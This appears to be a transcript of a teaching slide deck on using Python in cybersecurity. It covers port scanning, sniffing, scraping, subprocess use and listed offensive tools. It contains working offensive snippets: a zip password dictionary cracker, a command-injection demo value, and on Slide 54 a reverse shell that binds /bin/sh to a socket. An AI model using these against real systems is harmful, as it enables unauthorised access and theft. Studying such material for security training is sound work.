Slide 1

www.sti-innsbruck.at
Python for cybersecurity teams
@jmortegac

Slide 2

About me
http://jmortega.github.io/

Slide 3

About me
https://www.youtube.com/c/JoseManuelOrtegadev/

Slide 4

Books
● Introduction to secure development
● Fundamentals of secure development
● OWASP tools
● Security in Android applications
● Security in NodeJS projects
● Security in Python projects
● Static and dynamic analysis in C/C++ applications
● Development methodologies

Slide 5

Books

Slide 6

Training
https://www.adrformacion.com/cursos/pythonseg/pythonseg.html

Slide 7

Agenda
• Introduction to Python for cybersecurity projects
• Pentesting tools
• Python tools from a defensive point of view
• Python tools from an offensive point of view

Slide 8

Python for cybersecurity projects
1. Designed for rapid prototyping.
2. Simple and clean structure, which improves readability and ease of use.
3. Extensive standard library, and easy to interconnect with other tools.
4. Widely adopted: most Linux distributions install it by default.

Slide 9

Python for cybersecurity projects

Slide 10

Pentesting tools

```python
import boto3

# Credentials are left empty on the slide; in practice load them from the
# environment or an AWS profile instead of hard-coding them in the script.
aws_access_key_id = ''
aws_secret_access_key = ''
region_name = 'ap-southeast-2'

session = boto3.session.Session(aws_access_key_id=aws_access_key_id,
                                aws_secret_access_key=aws_secret_access_key,
                                region_name=region_name)
ec2client = session.client('ec2')

# Launch a single t2.micro instance from the given AMI with the 'Keys' key pair
client_instance = ec2client.run_instances(ImageId='ami-30041c53',
                                          KeyName='Keys',
                                          MinCount=1,
                                          MaxCount=1,
                                          InstanceType='t2.micro')
```

https://aws.amazon.com/es/sdk-for-python/

Slide 11

Pentesting tools

Slide 12

Pentesting tools

```python
import re

input_ip = input('Enter the ip:')
flag = 0
# The dots must be escaped: an unescaped '.' matches any character,
# so the original pattern also accepted strings such as "1a2b3c4"
pattern = r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"
match = re.match(pattern, input_ip)
if match:
    field = input_ip.split(".")
    for i in range(0, len(field)):
        # Every octet must be in the range 0-255
        if int(field[i]) < 256:
            flag += 1
        else:
            flag = 0
if flag == 4:
    print("valid ip")
else:
    print('No match for ip or not a valid ip')
```

https://docs.python.org/3/library/re.html

Slide 13

Pentesting tools

Slide 14

Pentesting tools

```python
import nmap

nma = nmap.PortScannerAsync()


def callback_function(host, scan_result):
    # Invoked once per host as soon as its scan has finished
    print('RESULTADO ==>')
    print(host, scan_result)


# Default scripts (-sC), skip host discovery (-Pn)
nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function)
while nma.still_scanning():
    print("Esperando a que termine el escaneo ...")
    nma.wait(2)
```

https://pypi.org/project/python-nmap/

Slide 15

Basic Networking

Slide 16

Port Scanning

Slide 17

Port Scanning

Slide 18

Port Scanning

```python
import socket
from concurrent import futures


def check_port(targetIp, portNumber, timeout):
    TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    TCPsock.settimeout(timeout)
    try:
        TCPsock.connect((targetIp, portNumber))
        return portNumber
    except (OSError, socket.timeout):
        # Refused, filtered or timed out: the port is not open
        return None
    finally:
        TCPsock.close()


def port_scanner(targetIp, timeout):
    threadPoolSize = 500
    portsToCheck = 10000
    # The context manager waits for all workers and releases the pool
    with futures.ThreadPoolExecutor(max_workers=threadPoolSize) as executor:
        checks = [executor.submit(check_port, targetIp, port, timeout)
                  for port in range(0, portsToCheck)]
        for response in futures.as_completed(checks):
            if response.result():
                print('Listening on port: {}'.format(response.result()))
```

Slide 19

Port Scanning

Slide 20

Banner Grabbing
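The slide only names the technique, so here is an added example of banner grabbing (not code from the talk): a throwaway local service is started on the loopback interface so the grab can be exercised offline, the client reads whatever the service volunteers first, and an SSH-style identification string is parsed. The fake service and its banner are constructed for this example.

```python
import socket
import threading

# Constructed for this example: a local service that greets clients with a banner
FAKE_BANNER = b"SSH-2.0-ExampleServer_1.0\r\n"


def start_fake_service(banner):
    """Listen on an ephemeral loopback port, serve a single client, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def grab_banner(host, port, timeout=2.0, max_bytes=1024):
    """Connect and read the first bytes the service sends on its own.
    Returns '' when the port is closed or the service stays silent."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            data = sock.recv(max_bytes)
    except OSError:  # refused, unreachable or timed out (socket.timeout is an OSError)
        return ""
    # Decode leniently: a banner is untrusted input and need not be valid UTF-8
    return data.decode("utf-8", errors="replace").strip()


def parse_ssh_banner(banner):
    """Split an SSH identification string (RFC 4253: SSH-protoversion-softwareversion)."""
    if not banner.startswith("SSH-"):
        return {}
    parts = banner.split("-", 2)
    return {"protoversion": parts[1], "software": parts[2] if len(parts) > 2 else ""}


if __name__ == "__main__":
    port = start_fake_service(FAKE_BANNER)
    banner = grab_banner("127.0.0.1", port)
    print(port, repr(banner), parse_ssh_banner(banner))
```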

Slide 21

Scraping
● Requests
  ○ https://docs.python-requests.org/en/master
  ○ HTTP requests
● BeautifulSoup
  ○ https://www.crummy.com/software/BeautifulSoup/bs4/doc
  ○ XML and HTML parser
● Scrapy
  ○ https://scrapy.org
  ○ Scraping framework

Slide 22

Scraping

```python
#!/bin/python
from bs4 import BeautifulSoup
import requests

url = input("Enter a website to extract the URL's from: ")
response = requests.get("http://" + url)
data = response.text
# Name the parser explicitly; bs4 warns when it has to guess one
soup = BeautifulSoup(data, 'html.parser')
for link in soup.find_all('a'):
    print(link.get('href'))
```

Slide 23

Scrapy

Slide 24

Subdomain extraction
● https://github.com/1N3/BlackWidow

Slide 25

OSINT
● Recon-ng
  ○ https://github.com/lanmaster53/recon-ng
  ○ Framework for web-based reconnaissance.
● Belati
  ○ https://github.com/aancw/Belati
  ○ Collects public data and documents from websites and other services.
● Pwndb
  ○ https://github.com/davidtavarez/pwndb
  ○ Search for leaked credentials

Slide 26

wig - WebApp Information Gatherer

Slide 27

wig - WebApp Information Gatherer

Slide 28

Belati

Slide 29

Belati

Slide 30

Reconspider
● https://github.com/bhavsec/reconspider

Slide 31

Reconspider

Slide 32

SpiderFoot

Slide 33

RED TEAM vs BLUE TEAM

Slide 34

SQLMap
● https://sqlmap.org

Slide 35

SQLMap

Slide 36

PwnXSS

Slide 37

Fuzzing
● Wfuzz
  ○ https://github.com/xmendez/wfuzz/
  ○ Web fuzzer framework
● Pyfuzz
  ○ https://github.com/AyoobAli/pyfuzz
  ○ Fuzzing to discover hidden files / directories

Slide 38

Fuxi Scanner
● https://github.com/jeffzh3ng/fuxi

Slide 39

Fuxi Scanner

Slide 40

Packet sniffing

```python
import socket
import struct


def ethernet_frame(data):
    # '!' unpacks in network byte order, so proto is already usable as a number;
    # the original passed it through htons() and compared against 8, which only
    # equals 0x0800 on little-endian hosts
    dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14])
    return format_mac_addr(dest_mac), format_mac_addr(src_mac), proto, data[14:]


def format_mac_addr(bytes_addr):
    bytes_str = map('{:02x}'.format, bytes_addr)
    return ':'.join(bytes_str).upper()


def main():
    # Raw AF_PACKET socket receiving every protocol (ETH_P_ALL = 3); requires root
    conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
    while True:
        raw_data, addr = conn.recvfrom(65535)
        dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data)
        if eth_proto == 0x0800:  # IPv4
            print('\nEthernet Frame:')
            print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto))
            print(data)


if __name__ == "__main__":
    main()
```
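The slide stops at the Ethernet header. As an added example (not from the talk), this carries the same struct-based dissection one step further through IPv4 and TCP, honouring the IHL and data-offset fields so that headers with options are handled, and builds a constructed SYN frame so the parser can be run without root or a live interface.

```python
import socket
import struct


def parse_ethernet(frame):
    """Ethernet II header: 6-byte dst MAC, 6-byte src MAC, 2-byte EtherType ('!' = network order)."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    mac = lambda b: ":".join("{:02x}".format(x) for x in b).upper()
    return {"dst": mac(dst), "src": mac(src), "ethertype": ethertype, "payload": frame[14:]}


def parse_ipv4(data):
    """Fixed IPv4 header; IHL (32-bit words) says where options end and the payload starts."""
    fields = struct.unpack("!BBHHHBBH4s4s", data[:20])
    ver_ihl, _tos, total_len, _ident, _flags, ttl, proto, _csum, src, dst = fields
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20 or total_len > len(data):
        raise ValueError("malformed IPv4 header")
    return {"ttl": ttl, "proto": proto, "src": socket.inet_ntoa(src),
            "dst": socket.inet_ntoa(dst), "payload": data[ihl:total_len]}


def parse_tcp(segment):
    """TCP header; the data offset (upper 4 bits of bytes 12-13) gives the header length."""
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", segment[:14])
    data_off = (off_flags >> 12) * 4
    flags = off_flags & 0x01FF
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "syn": bool(flags & 0x02), "ack_flag": bool(flags & 0x10),
            "payload": segment[data_off:]}


def dissect(frame):
    """Walk Ethernet -> IPv4 -> TCP, stopping at the first layer that is not handled."""
    out = {"eth": parse_ethernet(frame)}
    if out["eth"]["ethertype"] != 0x0800:      # not IPv4
        return out
    out["ip"] = parse_ipv4(out["eth"]["payload"])
    if out["ip"]["proto"] == 6:                # TCP
        out["tcp"] = parse_tcp(out["ip"]["payload"])
    return out


def build_sample_frame(payload=b"SSH-2.0-Sample"):
    """Constructed test frame (not a real capture): TCP SYN from 10.0.0.5:40000 to 10.0.0.9:22."""
    tcp = struct.pack("!HHIIHHHH", 40000, 22, 1, 0, (5 << 12) | 0x02, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, 6, 0,
                     socket.inet_aton("10.0.0.5"), socket.inet_aton("10.0.0.9"))
    return bytes.fromhex("0a0b0c0d0e0f") + bytes.fromhex("0102030405aa") + b"\x08\x00" + ip + tcp
```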

Slide 41

Packet manipulation
● Scapy
  ○ https://scapy.net
  ○ Packet manipulation and decoding.
  ○ Send, sniff, dissect and forge network packets.

Slide 42

Packet manipulation

```python
from scapy.all import *

packetCount = 0


def customAction(packet):
    global packetCount
    packetCount += 1
    # packet[0][1] is the layer above Ethernet, i.e. the IP header
    return "{}) {} → {}".format(packetCount, packet[0][1].src, packet[0][1].dst)


## Setup sniff, filtering for IP traffic
sniff(filter="ip", prn=customAction)
```

Slide 43

Packet manipulation

```python
from scapy.all import ICMP
from scapy.all import IP
from scapy.all import sr1
from scapy.all import ls

if __name__ == "__main__":
    dest_ip = "www.google.com"
    ip_layer = IP(dst=dest_ip)
    ls(ip_layer)  # displaying complete layer info (ls prints; wrapping it in print() just adds "None")
    # accessing the fields
    print("Destination = ", ip_layer.dst)
    print("Summary = ", ip_layer.summary())
```

Slide 44

Packet sniffing

```python
from scapy.all import *


def main():
    sniff(prn=http_header, filter="tcp port 80")


def http_header(packet):
    http_packet = str(packet)
    # str.find() returns -1 (truthy) when absent and 0 (falsy) when the match is
    # at the start, so the original condition was inverted; test membership instead
    if 'GET' in http_packet:
        return print_packet(packet)


def print_packet(packet1):
    ret = "-------------------------------[ Received Packet ] -------------------------------\n"
    ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n"))
    ret += "---------------------------------------------------------------------------------\n"
    return ret


if __name__ == '__main__':
    main()
```

Slide 45

Exploitation
● Pacu
  ○ https://github.com/RhinoSecurityLabs/pacu
  ○ AWS exploitation framework
● AWS Pwn
  ○ https://github.com/dagrz/aws_pwn
  ○ Collection of AWS penetration testing scripts

Slide 46

Exploitation
● CrackMapExec
  ○ https://github.com/byt3bl33d3r/CrackMapExec
  ○ Maps the network, obtains credentials and executes commands.
● DeathStar
  ○ https://github.com/byt3bl33d3r/DeathStar
    ■ Automates privilege escalation in an Active Directory environment.

Slide 47

Password cracking

```python
import zipfile
import time

encrypted_filename = "secret_file.zip"
zFile = zipfile.ZipFile(encrypted_filename, "r")
passFile = open("passwords.txt", "r")
for line in passFile.readlines():
    test_password = line.strip("\n").encode('utf-8')
    try:
        print(test_password)
        zFile.extractall(pwd=test_password)
        print("Match found")
        break
    except Exception as err:
        # A wrong password raises RuntimeError; try the next candidate
        pass
```

Slide 48

SSH brute force

```python
import paramiko

ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
# AutoAddPolicy accepts unknown host keys silently, which disables the
# protection against a man-in-the-middle on first connection
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('127.0.0.1', username='user', password='password')
stdin, stdout, stderr = ssh.exec_command("uname -a")
```

Slide 49

SSH brute force

Slide 50

Process execution
https://docs.python.org/3/library/subprocess.html

```python
import subprocess

# Command string handed to /bin/sh for parsing
subprocess.run('ls -la', shell=True)
# Argument list executed directly, with no shell involved
subprocess.run(['ls', '-la'])
```
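The two calls on the slide behave identically for a fixed command but not once part of the command comes from outside. As an added example (not from the talk), the three functions below run the same `ls -la` with a constructed input that carries a shell metacharacter, showing why the argument-list form is the safe default and how shlex.quote neutralises the input when a shell really is needed; it assumes a POSIX system with /bin/sh and ls available.

```python
import shlex
import subprocess

# Constructed attacker-style input for this example: a "directory name" that
# carries a shell metacharacter followed by a second command.
UNTRUSTED_DIR = "/tmp; echo INJECTED"


def list_dir_shell(path):
    """String command with shell=True: /bin/sh splits on ';' and runs both commands."""
    return subprocess.run("ls -la " + path, shell=True, capture_output=True, text=True)


def list_dir_argv(path):
    """Argument list, no shell: the whole string reaches ls as one argument."""
    return subprocess.run(["ls", "-la", path], capture_output=True, text=True)


def list_dir_quoted(path):
    """If a shell is unavoidable, shlex.quote() turns the input into a single literal word."""
    return subprocess.run("ls -la " + shlex.quote(path), shell=True,
                          capture_output=True, text=True)


def injected(result):
    """True when the echo smuggled in through the input actually ran."""
    return "INJECTED" in result.stdout


if __name__ == "__main__":
    for fn in (list_dir_shell, list_dir_argv, list_dir_quoted):
        r = fn(UNTRUSTED_DIR)
        print(f"{fn.__name__}: returncode={r.returncode} injected={injected(r)}")
```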

Slide 51

Process execution
https://docs.python.org/3/library/subprocess.html

```python
import subprocess

process = subprocess.run(['which', 'python3'], capture_output=True)
if process.returncode != 0:
    raise OSError('Sorry python3 is not installed')
# stdout is bytes because text=True was not requested
python_bin = process.stdout.strip()
print(f'Python found in: {python_bin}')
```

The CompletedProcess object returned by run():

```
CompletedProcess(args=['which', 'python3'], returncode=0, stdout=b'/usr/bin/python3\n', stderr=b'')
```

Slide 52

Process execution
https://docs.python.org/3/library/subprocess.html

```python
from pathlib import Path
import subprocess

source = Path("/home/linux")
cmd = ["ls", "-l", source]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
stdout, stderr = proc.communicate()  # stderr is None: it was not captured
print(stdout.decode("utf-8").split('\n')[:-1])
```

Slide 53

Reverse shell

Slide 54

Reverse shell

```python
#!/usr/bin/python
import socket
import subprocess
import os

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 45679))
# Point stdin, stdout and stderr of this process at the socket
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
shell_remote = subprocess.call(["/bin/sh", "-i"])
#proc = subprocess.call(["/bin/ls", "-i"])
```

Slide 55

Books

Slide 56

Books
https://github.com/PacktPublishing/Python-Ethical-Hacking
https://github.com/PacktPublishing/Python-for-Offensive-PenTest

Slide 57

GitHub repository
https://github.com/jmortega/python_ciberseguridad_2021
